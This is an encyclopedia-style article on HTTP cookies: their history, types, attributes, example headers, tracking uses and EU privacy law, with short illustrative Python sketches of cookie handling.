HTTP cookie
from Wikipedia

An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small block of data created by a web server while a user is browsing a website and placed on the user's computer or other device by the user's web browser. Cookies are placed on the device used to access a website, and more than one cookie may be placed on a user's device during a session.

Cookies serve useful and sometimes essential functions on the web. They enable web servers to store stateful information (such as items added in the shopping cart in an online store) on the user's device or to track the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past).[1] They can also be used to save information that the user previously entered into form fields, such as names, addresses, passwords, and payment card numbers for subsequent use.

Authentication cookies are commonly used by web servers to authenticate that a user is logged in, and with which account they are logged in. Without the cookie, users would need to authenticate themselves by logging in on each page containing sensitive information that they wish to access. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by an attacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples).[2]

Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories — a potential privacy concern that prompted European[3] and U.S. lawmakers to take action in 2011.[4][5] European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device.

Background


Origin of the name

HTTP cookies share their name with a popular baked treat.

The term cookie was coined by web-browser programmer Lou Montulli. It was derived from the term magic cookie, which is a packet of data a program receives and sends back unchanged, used by Unix programmers.[6][7]

History


Magic cookies were already used in computing when computer programmer Lou Montulli had the idea of using them in web communications in June 1994.[8] At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for MCI. Vint Cerf and John Klensin represented MCI in technical discussions with Netscape Communications. MCI did not want its servers to have to retain partial transaction states, which led them to ask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.[9][10]

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994,[11][12] supported cookies.[10] The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, which was granted in 1998.[13] Support for cookies was integrated with Internet Explorer in version 2, released in October 1995.[14]

The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence.[15] The public learned about cookies after the Financial Times published an article about them on February 12, 1996.[16] In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.[2]

The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the Internet Engineering Task Force (IETF) was formed. Brian Behlendorf and David Kristol had each put forward an alternative proposal for introducing state in HTTP transactions. But the group, headed by Kristol himself and Lou Montulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies are either not allowed at all, or at least not enabled by default.[17] At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.

RFC 2965 added a Set-Cookie2 header field, which informally came to be called "RFC 2965-style cookies" as opposed to the original Set-Cookie header field, which was called "Netscape-style cookies".[18][19] Set-Cookie2 was seldom used, however, and was deprecated in April 2011 by RFC 6265, which was written as a definitive specification for cookies as used in the real world.[20] No modern browser recognizes the Set-Cookie2 header field.[21]

Terminology

Session cookie

A session cookie (also known as an in-memory cookie, transient cookie or non-persistent cookie) exists only in temporary memory while the user navigates a website.[22] Session cookies expire or are deleted when the user closes the web browser.[23] Session cookies are identified by the browser by the absence of an expiration date assigned to them.

Persistent cookie

A persistent cookie expires at a specific date or after a specific length of time. For the persistent cookie's lifespan set by its creator, its information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).

For this reason, persistent cookies are sometimes referred to as tracking cookies[24][25] because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. Persistent cookies are also used for reasons such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit. (See § Uses, below.)

Secure cookie

A secure cookie can only be transmitted over an encrypted connection (i.e. HTTPS). It cannot be transmitted over unencrypted connections (i.e. HTTP). This makes the cookie less likely to be exposed to cookie theft via eavesdropping. A cookie is made secure by adding the Secure flag to the cookie.

Http-only cookie

An http-only cookie cannot be accessed by client-side APIs, such as JavaScript. This restriction eliminates the threat of cookie theft via cross-site scripting (XSS).[26] However, the cookie remains vulnerable to cross-site tracing (XST) and cross-site request forgery (CSRF) attacks. A cookie is given this characteristic by adding the HttpOnly flag to the cookie.

Same-site cookie

In 2016 Google Chrome version 51 introduced[27] a new kind of cookie with the attribute SameSite, with possible values of Strict, Lax or None.[28] With SameSite=Strict, browsers only send cookies to a target domain that is the same as the origin domain. This effectively mitigates cross-site request forgery (CSRF) attacks. With SameSite=Lax, browsers send cookies with requests to a target domain even if it is different from the origin domain, but only for safe requests such as GET (POST is unsafe) and not as third-party cookies (inside an iframe). SameSite=None allows third-party (cross-site) cookies; however, most browsers require the Secure attribute on SameSite=None cookies.[29]
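The three SameSite values can be read as a small decision procedure. The sketch below is a simplified model of that decision, not any browser's actual algorithm; the function name, its parameters, and the treatment of "top-level navigation" as a single boolean are assumptions made for illustration.

```python
# Methods defined as "safe" by the HTTP specification (RFC 7231).
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


def should_send_cookie(same_site: str,
                       is_same_site_request: bool,
                       method: str = "GET",
                       is_top_level_navigation: bool = False,
                       secure: bool = False) -> bool:
    """Simplified SameSite check (hypothetical helper, not a browser API)."""
    policy = same_site.lower()
    if policy not in {"strict", "lax", "none"}:
        raise ValueError(f"unknown SameSite value: {same_site!r}")
    if is_same_site_request:
        # Same-site requests carry the cookie under every policy.
        return True
    if policy == "strict":
        return False
    if policy == "lax":
        # Cross-site: only top-level navigations with a safe method qualify,
        # so requests from inside an iframe are excluded.
        return is_top_level_navigation and method.upper() in SAFE_METHODS
    # SameSite=None: cross-site use is allowed, but most browsers
    # additionally require the Secure attribute.
    return secure
```

Under this model a cross-site form POST never carries a Strict or Lax cookie, which is the property that mitigates CSRF.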

The Same-site cookie is incorporated into a new RFC draft for "Cookies: HTTP State Management Mechanism"[30] to update RFC 6265 (if approved).

Chrome, Firefox, and Edge started to support Same-site cookies.[31] The key issue in the rollout is the treatment of existing cookies that do not define the SameSite attribute. Chrome had been treating those cookies as if SameSite=None, which let all websites and applications run as before. Google intended to change that default to SameSite=Lax in Chrome 80, planned for release in February 2020,[32] but due to the potential for breakage of applications and websites that rely on third-party/cross-site cookies, and to COVID-19 circumstances, Google postponed this change to Chrome 84.[33][34]

Supercookie


A supercookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as .co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such as example.com.

Supercookies can be a potential security concern and are therefore often blocked by web browsers. If unblocked by the browser, an attacker in control of a malicious website could set a supercookie and potentially disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as the malicious website. For example, a supercookie with an origin of .com could maliciously affect a request made to example.com, even if the cookie did not originate from example.com. This can be used to fake logins or change user information.

The Public Suffix List[35] helps to mitigate the risk that supercookies pose. The Public Suffix List is a cross-vendor initiative that aims to provide an accurate and up-to-date list of domain name suffixes. Older versions of browsers may not have an up-to-date list, and will therefore be vulnerable to supercookies from certain domains.
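As a rough illustration of how a browser might use such a list, the sketch below rejects a cookie whose Domain attribute is itself a public suffix. The four-entry set is a hypothetical stand-in for the real Public Suffix List, and the function name is an assumption.

```python
# Hypothetical, tiny excerpt for illustration only; a real browser ships
# the complete, regularly updated Public Suffix List.
PUBLIC_SUFFIXES = {"com", "org", "uk", "co.uk"}


def is_supercookie_domain(cookie_domain: str) -> bool:
    """Return True if the Domain attribute names a public suffix."""
    # A leading dot (".com") is ignored, as in modern cookie handling.
    domain = cookie_domain.lstrip(".").lower()
    return domain in PUBLIC_SUFFIXES
```

A browser following this approach would refuse to store a cookie for which is_supercookie_domain returns True, while still accepting a cookie scoped to example.com.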

Other uses


The term supercookie is sometimes used for tracking technologies that do not rely on HTTP cookies. Two such supercookie mechanisms were found on Microsoft websites in August 2011: cookie syncing that respawned MUID (machine unique identifier) cookies, and ETag cookies.[36] Due to media attention, Microsoft later disabled this code.[37] In a 2021 blog post, Mozilla used the term supercookie to refer to the use of browser cache as a means of tracking users across sites.[38]

Zombie cookie

A zombie cookie is data and code that has been placed by a web server on a visitor's computer or other device in a hidden location outside the visitor's web browser's dedicated cookie storage location, and that automatically recreates an HTTP cookie as a regular cookie after the original cookie has been deleted. The zombie cookie may be stored in multiple locations, such as Flash Local shared object, HTML5 Web storage, and other client-side and even server-side locations. When its absence is detected in one of the locations, the missing instance is recreated by the JavaScript code using the data stored in other locations.[39][40]

Cookie wall

A cookie wall pops up on a website and informs the user of the website's cookie usage. It has no reject option, and the website is not accessible without tracking cookies.

Structure


A cookie consists of the following components:[41][42][43]

  1. Name
  2. Value
  3. Zero or more attributes (name/value pairs). Attributes store information such as the cookie's expiration, domain, and flags (such as Secure and HttpOnly).
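The three components can be made concrete by splitting a Set-Cookie header value into its parts. This is a minimal sketch that assumes a well-formed header; the ParsedCookie type and parse_set_cookie function are illustrative names, and real parsers handle many more edge cases.

```python
from typing import Dict, NamedTuple


class ParsedCookie(NamedTuple):
    name: str
    value: str
    attributes: Dict[str, str]  # lowercased attribute name -> value


def parse_set_cookie(header_value: str) -> ParsedCookie:
    """Split a Set-Cookie value into name, value and attributes."""
    first, *rest = header_value.split(";")
    name, _, value = first.strip().partition("=")
    attributes: Dict[str, str] = {}
    for part in rest:
        part = part.strip()
        if not part:
            continue
        key, _, attr_value = part.partition("=")
        # Flags such as Secure and HttpOnly have no value; store "".
        attributes[key.strip().lower()] = attr_value.strip()
    return ParsedCookie(name.strip(), value.strip(), attributes)
```

For example, parsing `sid=abc; Path=/; Secure` yields the name `sid`, the value `abc`, and the attributes `path` (with value `/`) and `secure` (with an empty value).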

Uses


Session management


Cookies were originally introduced to provide a way for users to record items they want to purchase as they navigate throughout a website (a virtual shopping cart or shopping basket).[9][10] Today, however, the contents of a user's shopping cart are usually stored in a database on the server, rather than in a cookie on the client. To keep track of which user is assigned to which shopping cart, the server sends a cookie to the client that contains a unique session identifier (typically, a long string of random letters and numbers). Because cookies are sent to the server with every request the client makes, that session identifier will be sent back to the server every time the user visits a new page on the website, which lets the server know which shopping cart to display to the user.

Another popular use of cookies is for logging into websites. When the user visits a website's login page, the web server typically sends the client a cookie containing a unique session identifier. When the user successfully logs in, the server remembers that that particular session identifier has been authenticated and grants the user access to its services.
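The pattern described here, where the cookie carries only an identifier and the server keeps the state, might look like the following sketch. SessionStore and its methods are hypothetical names, and an in-memory dictionary stands in for the server-side database.

```python
import secrets
from typing import Dict, Optional


class SessionStore:
    """In-memory stand-in for a server-side session database."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def create(self) -> str:
        """Create a session and return the ID to send in a cookie."""
        session_id = secrets.token_urlsafe(32)  # long random identifier
        self._sessions[session_id] = {"authenticated": False, "cart": []}
        return session_id

    def mark_authenticated(self, session_id: str, user: str) -> None:
        """Record that this session ID belongs to a logged-in user."""
        session = self._sessions[session_id]
        session["authenticated"] = True
        session["user"] = user

    def get(self, session_id: str) -> Optional[dict]:
        """Look up the state for the ID received in the Cookie header."""
        return self._sessions.get(session_id)
```

On each request the server would call get with the identifier from the cookie; an unknown identifier returns None and is treated as a new visitor.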

Because a session cookie contains only a unique session identifier, the amount of personal information that a website can save about each user is virtually limitless: the website is not constrained by limits on how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.

Personalization


Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.

Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, the Google search engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wanted to see. Also, DuckDuckGo uses cookies to allow users to set viewing preferences such as the colors of the web page.

Tracking


Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using the IP address of the computer requesting the page or the referer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:

  1. If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user. So the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page.
  2. From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server not only sends the page as usual but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.

By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
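The log analysis can be sketched as grouping log entries by cookie value. The tuple layout (timestamp, cookie ID, URL) and the function name are assumptions; a real server log would need to be parsed into this shape first.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

LogEntry = Tuple[float, str, str]  # (timestamp, cookie_id, url)


def pages_by_visitor(log_entries: Iterable[LogEntry]) -> Dict[str, List[Tuple[float, str]]]:
    """Reconstruct each visitor's page sequence from the request log."""
    history: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    # Sorting by timestamp first recovers the order of visits.
    for timestamp, cookie_id, url in sorted(log_entries):
        history[cookie_id].append((timestamp, url))
    return dict(history)
```

The difference between consecutive timestamps for one cookie ID then gives an estimate of how long the visitor stayed on each page.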

Corporations exploit users' web habits by tracking cookies to collect information about buying habits. The Wall Street Journal found that America's top fifty websites installed an average of sixty-four pieces of tracking technology onto computers, resulting in a total of 3,180 tracking files.[44] The data can then be collected and sold to bidding corporations.

Implementation

A possible interaction between a web browser and a web server holding a web page in which the server sends a cookie to the browser and the browser sends it back when requesting another page

Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducing states (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a web page or component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such as JavaScript (unless the cookie's HttpOnly flag is set, in which case the cookie cannot be modified by scripting languages).

The cookie specifications[45][46] require that browsers meet the following requirements in order to support cookies:

  • Can support cookies as large as 4,096 bytes in size.
  • Can support at least 50 cookies per domain (i.e. per website).
  • Can support at least 3,000 cookies in total.

Setting a cookie

Cookies are set using the Set-Cookie header field, sent in an HTTP response from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will ignore this header field if it does not support cookies or has disabled cookies).

As an example, the browser sends its first HTTP request for the homepage of the www.example.org website:

GET /index.html HTTP/1.1
Host: www.example.org
...

The server responds with two Set-Cookie header fields:

HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: theme=light
Set-Cookie: sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT
...

The server's HTTP response contains the contents of the website's homepage. But it also instructs the browser to set two cookies. The first, theme, is considered to be a session cookie since it does not have an Expires or Max-Age attribute. Session cookies are intended to be deleted by the browser when the browser closes. The second, sessionToken, is considered to be a persistent cookie since it contains an Expires attribute, which instructs the browser to delete the cookie at a specific date and time.

Next, the browser sends another request to visit the spec.html page on the website. This request contains a Cookie header field, which contains the two cookies that the server instructed the browser to set:

GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: theme=light; sessionToken=abc123
...

This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, possibly including more Set-Cookie header fields in the HTTP response in order to instruct the browser to add new cookies, modify existing cookies, or remove existing cookies. To remove a cookie, the server must include a Set-Cookie header field with an expiration date in the past.
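The exchange above can be simulated with a very small client-side cookie store. This sketch deliberately ignores Domain, Path and Max-Age and only models storing, sending back, and removal through an expiration date in the past; TinyCookieJar is a hypothetical name, not a standard class.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Dict, Optional, Tuple


class TinyCookieJar:
    """Toy cookie store: name -> (value, expiry or None)."""

    def __init__(self) -> None:
        self._cookies: Dict[str, Tuple[str, Optional[datetime]]] = {}

    def store(self, set_cookie_value: str, now: Optional[datetime] = None) -> None:
        """Process one Set-Cookie header value."""
        now = now or datetime.now(timezone.utc)
        first, *attrs = set_cookie_value.split(";")
        name, _, value = first.strip().partition("=")
        expires = None
        for attr in attrs:
            key, _, attr_value = attr.strip().partition("=")
            if key.lower() == "expires":
                expires = parsedate_to_datetime(attr_value.strip())
        if expires is not None and expires <= now:
            self._cookies.pop(name, None)  # past expiry removes the cookie
        else:
            self._cookies[name] = (value, expires)

    def cookie_header(self, now: Optional[datetime] = None) -> str:
        """Build the Cookie header value for the next request."""
        now = now or datetime.now(timezone.utc)
        live = [f"{name}={value}"
                for name, (value, expires) in self._cookies.items()
                if expires is None or expires > now]
        return "; ".join(live)
```

Only name=value pairs are sent back; the attributes stay in the browser.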

The value of a cookie may consist of any printable ASCII character (! through ~, Unicode \u0021 through \u007E) excluding , and ; and whitespace characters. The name of a cookie excludes the same characters, as well as =, since that is the delimiter between the name and value. The cookie standard RFC 2965 is more restrictive but not implemented by browsers.
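The character rule in the preceding paragraph can be expressed as a pair of checks. The sketch follows the rule exactly as worded in this article rather than the full grammar of any RFC, and both function names are illustrative.

```python
def is_valid_cookie_value(value: str) -> bool:
    """Printable ASCII from ! to ~, excluding comma and semicolon."""
    # Whitespace falls outside the ! .. ~ range, so it is rejected too.
    return all("!" <= ch <= "~" and ch not in ",;" for ch in value)


def is_valid_cookie_name(name: str) -> bool:
    """Same rule as values, and additionally no '=' (the delimiter)."""
    return bool(name) and all("!" <= ch <= "~" and ch not in ",;=" for ch in name)
```

Values that need other characters are typically encoded (for example with percent-encoding or Base64) before being placed in a cookie.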

The term cookie crumb is sometimes used to refer to a cookie's name–value pair.[47]

Cookies can also be set by scripting languages such as JavaScript that run within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name temperature and value 20.[48]

Cookie attributes

In addition to a name and value, cookies can also have one or more attributes. Browsers do not include cookie attributes in requests to the server—they only send the cookie's name and value. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie to the server.

Domain and Path


The Domain and Path attributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For security reasons, cookies can only be set on the current resource's top domain and its subdomains, and not for another domain and its subdomains. For example, the website example.org cannot set a cookie that has a domain of foo.com because this would allow the website example.org to control the cookies of the domain foo.com.

If a cookie's Domain and Path attributes are not specified by the server, they default to the domain and path of the resource that was requested.[49] However, in most browsers there is a difference between a cookie set from foo.com without a domain, and a cookie set with the foo.com domain. In the former case, the cookie will only be sent for requests to foo.com, also known as a host-only cookie. In the latter case, all subdomains are also included (for example, docs.foo.com).[50][51] A notable exception to this general rule is Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always send cookies to subdomains regardless of whether the cookie was set with or without a domain.[52]

Below is an example of some Set-Cookie header fields in the HTTP response of a website after a user logged in. The HTTP request was sent to a webpage within the docs.foo.com subdomain:

HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
...

The first cookie, LSID, has no Domain attribute, and has a Path attribute set to /accounts. This tells the browser to use the cookie only when requesting pages contained in docs.foo.com/accounts (the domain is derived from the request domain). The other two cookies, HSID and SSID, would be used when the browser requests any subdomain in .foo.com on any path (for example www.foo.com/bar). The prepending dot is optional in recent standards, but can be added for compatibility with RFC 2109 based implementations.[53]
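The scoping rules for the three cookies above can be sketched as two matching functions, modelled on the domain-match and path-match rules of RFC 6265. The function names and the host_only flag are assumptions for illustration, and the sketch does not handle IP-address hosts.

```python
def domain_matches(request_host: str, cookie_domain: str, host_only: bool) -> bool:
    """Decide whether a cookie's domain scope covers the request host."""
    host = request_host.lower()
    domain = cookie_domain.lstrip(".").lower()  # the leading dot is optional
    if host_only:
        # No Domain attribute was given: exact host match only.
        return host == domain
    # Domain attribute given: the host itself or any of its subdomains.
    return host == domain or host.endswith("." + domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    """Decide whether a cookie's Path covers the request path."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # The prefix must end at a "/" boundary, so that /accounts
        # does not match /accountsettings.
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False
```

With these rules, LSID (host-only, Path=/accounts) is sent to docs.foo.com/accounts/login but not to www.foo.com, while HSID and SSID are sent to www.foo.com/bar.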

Expires and Max-Age


The Expires attribute defines a specific date and time for when the browser should delete the cookie. The date and time are specified in the form Wdy, DD Mon YYYY HH:MM:SS GMT, or in the form Wdy, DD Mon YY HH:MM:SS GMT for values of YY where YY is greater than or equal to 0 and less than or equal to 69.[54]

Alternatively, the Max-Age attribute can be used to set the cookie's expiration as an interval of seconds in the future, relative to the time the browser received the cookie. Below is an example of three Set-Cookie header fields that were received from a website after a user logged in:

HTTP/1.0 200 OK
Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Jan 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.example.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly

The first cookie, lu, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie, made_write_conn, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie, reg_fb_gate, has its value changed to deleted, with an expiration time in the past. The browser will delete this cookie right away because its expiration time is in the past. Note that the cookie will only be deleted if the Domain and Path attributes in the Set-Cookie field match the values used when the cookie was created.
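The relationship between Max-Age and Expires can be shown with a short calculation: a Max-Age of n seconds corresponds to an expiry n seconds after the cookie was received. The helper names below are illustrative; the date formatting relies on Python's standard email.utils module, which produces the same Wdy, DD Mon YYYY HH:MM:SS GMT layout.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime


def expires_from_max_age(received_at: datetime, max_age_seconds: int) -> datetime:
    """Convert a Max-Age interval into an absolute expiry time."""
    return received_at + timedelta(seconds=max_age_seconds)


def format_expires(moment: datetime) -> str:
    """Format a timezone-aware datetime as an Expires attribute value."""
    # usegmt=True requires a UTC datetime and emits the "GMT" suffix.
    return format_datetime(moment.astimezone(timezone.utc), usegmt=True)
```

For instance, a cookie received at 09:18:14 GMT on 9 June 2021 with Max-Age=3600 expires at the same instant as one sent with Expires=Wed, 09 Jun 2021 10:18:14 GMT.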

As of 2016 Internet Explorer did not support Max-Age.[55][56]

Secure and HttpOnly


The Secure and HttpOnly attributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.

The Secure attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via secure/encrypted connections. However, if a web server sets a cookie with the Secure attribute from a non-secure connection, the cookie can still be intercepted by man-in-the-middle attacks when it is sent to the user. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.

The HttpOnly attribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. This means that the cookie cannot be accessed via client-side scripting languages (notably JavaScript), and therefore cannot be stolen easily via cross-site scripting (a pervasive attack technique).[57]
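The effect of the two flags on the browser side can be modelled as two filters over the stored cookies. This is a simplified sketch; the Cookie dataclass and both function names are assumptions, not part of any browser or library API.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Cookie:
    name: str
    value: str
    secure: bool = False
    http_only: bool = False


def cookies_for_request(cookies: List[Cookie], scheme: str) -> List[Cookie]:
    """Secure cookies are only attached to requests made over HTTPS."""
    return [c for c in cookies if not c.secure or scheme == "https"]


def cookies_visible_to_script(cookies: List[Cookie]) -> List[Cookie]:
    """HttpOnly cookies are hidden from client-side scripts."""
    return [c for c in cookies if not c.http_only]
```

A session identifier marked with both flags is therefore sent only over HTTPS and never appears in the script-visible cookie list.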

Browser settings


Most modern browsers support cookies and allow the user to disable them. The following are common options:[58]

  • To enable or disable cookies completely, so that they are always accepted or always blocked.
  • To view and selectively delete cookies using a cookie manager.
  • To fully wipe all private data, including cookies.

Add-on tools for managing cookie permissions also exist.[59][60][61][62]

Third-party cookie

Cookies have some important implications for the privacy and anonymity of web users. While cookies are sent only to the server setting them or a server in the same Internet domain, a web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. A third-party cookie belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as banner advertisements. This opens up the potential for tracking the user's browsing history and is used by advertisers to serve relevant advertisements to each user.

In this fictional example, an advertising company has placed banners in two websites. By hosting the banner images on its servers and using third-party cookies, the advertising company is able to track the browsing of users across these two sites.

As an example, suppose a user visits www.example.org. This website contains an advertisement from ad.foxytracking.com, which, when downloaded, sets a cookie belonging to the advertisement's domain (ad.foxytracking.com). Then, the user visits another website, www.foo.com, which also contains an advertisement from ad.foxytracking.com and sets a cookie belonging to that domain (ad.foxytracking.com). Eventually, both of these cookies will be sent to the advertiser when loading their advertisements or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites that have ads from this advertiser, through the use of the HTTP referer header field.
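The advertiser's side of this scenario can be sketched as a server that assigns an identifier on the first ad request and records the Referer value on every request. AdServer and serve_ad are hypothetical names, and the in-memory dictionary stands in for whatever storage a real tracker would use.

```python
import secrets
from collections import defaultdict
from typing import DefaultDict, List, Optional


class AdServer:
    """Toy model of a third-party ad server that tracks via one cookie."""

    def __init__(self) -> None:
        # visitor ID -> list of pages on which the ad was loaded
        self.history: DefaultDict[str, List[str]] = defaultdict(list)

    def serve_ad(self, cookie_id: Optional[str], referer: str) -> str:
        """Handle an ad request; return the ID to set in the cookie."""
        if cookie_id is None:
            # First contact: mint an identifier for this browser.
            cookie_id = secrets.token_hex(8)
        # The Referer header reveals which page embedded the ad.
        self.history[cookie_id].append(referer)
        return cookie_id
```

After the browser has loaded the ad on www.example.org and then on www.foo.com, the history for its identifier lists both sites.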

As of 2014, some websites were setting cookies readable for over 100 third-party domains.[63] On average, a single website was setting 10 cookies, with a maximum number of cookies (first- and third-party) reaching over 800.[64]

The older standards for cookies, RFC 2109[17] and RFC 2965, recommend that browsers should protect user privacy and not allow sharing of cookies between servers by default. However, the newer standard, RFC 6265, explicitly allows user agents to implement whichever third-party cookie policy they wish. Most modern web browsers contain privacy settings that can block third-party cookies. Since 2020, Apple Safari,[65] Firefox,[66] and Brave[67] block all third-party cookies by default. Safari allows embedded sites to use the Storage Access API to request permission to set first-party cookies. In May 2020, Google Chrome 83 introduced new features to block third-party cookies by default in its Incognito mode for private browsing, making blocking optional during normal browsing. The same update also added an option to block first-party cookies.[68] In April 2024, Chrome postponed third-party cookie blocking by default to 2025.[69] In July 2024, Google announced a plan to avoid blocking third-party cookies by default and instead prompt users to allow third-party cookies.[70]

Privacy


The possibility of building a profile of users is a privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.

Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of such cookie discovery.[71]

The United States government set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers that had visited its website. When notified it was violating policy, the CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency (NSA) had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the NSA immediately disabled the cookies.[72]

EU cookie directive

In 2002, the European Union launched the Directive on Privacy and Electronic Communications (e-Privacy Directive), a policy requiring end users' consent for the placement of cookies and similar technologies for storing and accessing information on users' equipment.[73][74] In particular, Article 5 Paragraph 3 mandates that storing technically unnecessary data on a user's computer can only be done if the user is provided information about how this data is used, and the user is given the possibility of denying this storage operation. The Directive does not require users to authorise or be provided notice of cookies that are functionally required for delivering a service they have requested, for example to retain settings, store log-in sessions, or remember what is in a user's shopping basket.[75]

In 2009, the law was amended by Directive 2009/136/EC, which included a change to Article 5, Paragraph 3. Instead of having an option for users to opt out of cookie storage, the revised Directive requires consent to be obtained for cookie storage.[74] The definition of consent is cross-referenced to the definition in European data protection law, firstly the Data Protection Directive 1995 and subsequently the General Data Protection Regulation (GDPR). As the definition of consent was strengthened in the text of the GDPR, this increased the quality of consent required by those storing and accessing information such as cookies on users' devices. In a case decided under the Data Protection Directive, however, the Court of Justice of the European Union later confirmed that the previous law implied the same strong quality of consent as the current instrument.[76] In addition to the requirement of consent which stems from storing or accessing information on a user's terminal device, the information in many cookies will be considered personal data under the GDPR alone, and will require a legal basis to process. This has been the case since the 1995 Data Protection Directive, which used an identical definition of personal data, although the GDPR in interpretative Recital 30 clarifies that cookie identifiers are included. While not all data processing under the GDPR requires consent, the characteristics of behavioural advertising mean that it is difficult or impossible to justify under any other ground.[77][78]

